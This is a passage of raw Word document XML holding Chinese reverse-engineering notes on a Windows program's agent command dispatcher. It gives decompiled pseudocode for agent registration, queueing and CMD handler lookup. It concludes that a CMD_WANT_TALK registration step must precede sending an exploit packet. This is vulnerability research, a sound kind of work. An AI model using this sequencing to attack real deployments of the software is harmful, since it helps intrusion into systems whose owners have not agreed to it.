          <w:rStyle w:val="71"/>
        </w:rPr>
        <w:t>else</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="64"/>
        </w:rPr>
        <w:t>// 所有其他 CMD（含 0x6460, 0x6700）</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve">    sub_14015B810</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t>ctx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="54"/>
        </w:rPr>
        <w:t>200</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> header</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>*,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> payload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>*);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="64"/>
        </w:rPr>
        <w:t>// → 代理事件分发</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3314E0F9">
      <w:r>
        <w:pict>
          <v:rect id="_x0000_i103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6"/>
    <w:p w14:paraId="6DDEA868">
      <w:pPr>
        <w:pStyle w:val="5"/>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="X8d6699ac2f663daf926d9812c59522c7fdb3496"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代理事件分发器（sub_14015B810</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sub_14015B3C0）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="387E083E">
      <w:pPr>
        <w:pStyle w:val="23"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">sub_14015B810 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不是直接的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CMD </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表查找器，而是"入队"函数：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3618ECA1">
      <w:pPr>
        <w:pStyle w:val="49"/>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="64"/>
        </w:rPr>
        <w:t>// sub_14015B810(ctx, header*, payload*)</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve">result </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> sub_140158830</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t>ctx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> header</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t>AgentID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72"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t>agent_idx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72"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t>agent_entry</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D730FCC">
      <w:pPr>
        <w:pStyle w:val="49"/>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5481955" cy="2125980"/>
            <wp:effectExtent l="0" t="0" r="4445" b="7620"/>
            <wp:docPr id="7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1955" cy="212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Style w:val="64"/>
        </w:rPr>
        <w:t>// 在 ctx+880 哈希表中以 AgentID 查找已注册的代理</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="71"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>(!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t>result</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="71"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="54"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="64"/>
        </w:rPr>
        <w:t>// 未注册的代理 → 数据包被丢弃！</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve">agent_entry </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> ctx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="54"/>
        </w:rPr>
        <w:t>416</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="54"/>
        </w:rPr>
        <w:t>1064</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> agent_idx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="64"/>
        </w:rPr>
        <w:t>// 代理条目（1064字节/条）</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="64"/>
        </w:rPr>
        <w:t>// 构建工作项（OCP头 + 载荷的拷贝）</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve">work_item </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> allocate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="54"/>
        </w:rPr>
        <w:t>40</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t>copy_header</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t>work_item</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> header</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t>copy_payload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t>work_item</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="54"/>
        </w:rPr>
        <w:t>32</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> payload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4762500" cy="3994150"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="8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99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Style w:val="64"/>
        </w:rPr>
        <w:t>// 根据锁标志入队</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="71"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t>locked_flag</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve">    sub_1402D1CE0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t>agent_entry</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="54"/>
        </w:rPr>
        <w:t>256</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> work_item</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="64"/>
        </w:rPr>
        <w:t>// 锁定队列</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve">    Interlocked</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>++</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t>（agent_entry</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="54"/>
        </w:rPr>
        <w:t>312</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="71"/>
        </w:rPr>
        <w:t>else</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve">    sub_1402D1CE0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t>agent_entry</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="54"/>
        </w:rPr>
        <w:t>200</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> work_item</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="64"/>
        </w:rPr>
        <w:t>// 普通队列</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t>sub_14015B3C0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t>ctx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> agent_idx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="64"/>
        </w:rPr>
        <w:t>// 通知工作线程</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="71"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="54"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D5B56B">
      <w:pPr>
        <w:pStyle w:val="49"/>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5480050" cy="3486150"/>
            <wp:effectExtent l="0" t="0" r="6350" b="6350"/>
            <wp:docPr id="9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0050" cy="348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74F7F">
      <w:pPr>
        <w:pStyle w:val="23"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sub_14015B3C0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（工作线程调度器）从队列取出工作项，调用：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42059B04">
      <w:pPr>
        <w:pStyle w:val="49"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t>sub_140069FC0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t>global_ctx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="54"/>
        </w:rPr>
        <w:t>896</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> agent_idx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> work_item</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> work_item</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t>CMD</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> flags</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="64"/>
        </w:rPr>
        <w:t>// ↑ 以 CMD 为键查找并调用第二个 CMD 表（0x1413DAxx）中的处理器</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0639E033">
      <w:pPr>
        <w:pStyle w:val="23"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>关键</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="48"/>
        </w:rPr>
        <w:t>sub_14015B810</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="48"/>
        </w:rPr>
        <w:t>sub_140158830</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会以</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="48"/>
        </w:rPr>
        <w:t>header.AgentID</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在代理注册表中查找。</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>若代理未注册（未执行</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CMD_WANT_TALK），该函数返回</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0，工作包</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>被静默丢弃</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>这证明</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> CMD_WANT_TALK </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>必须在发送漏洞利用包之前执行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="066D4C29">
      <w:r>
        <w:pict>
          <v:rect id="_x0000_i104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7"/>
    <w:p w14:paraId="6A9E20AC">
      <w:pPr>
        <w:pStyle w:val="5"/>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="X23963cdd906141d80419da7708b7165c9cf88e1"/>
      <w:bookmarkStart w:id="19" w:name="X75966e0b26822bff83803c349bd4a22c5c38812"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. sub_140BBA160 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分析</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C1EC85">
      <w:pPr>
        <w:pStyle w:val="49"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="64"/>
        </w:rPr>
        <w:t>// sub_140BBA160 (RetransferRecord.cpp:46)</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="64"/>
        </w:rPr>
        <w:t>// 参数: (ctx+1320, conn_id, agent_id, out1, out2, out3)</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t>BOOL sub_140BBA160</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t>__int64 list_head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53"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> conn_id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53"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> agent_id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 xml:space="preserve">                   DWORD</w:t>
      </w:r>
      <w:r>
        <w:rPr>
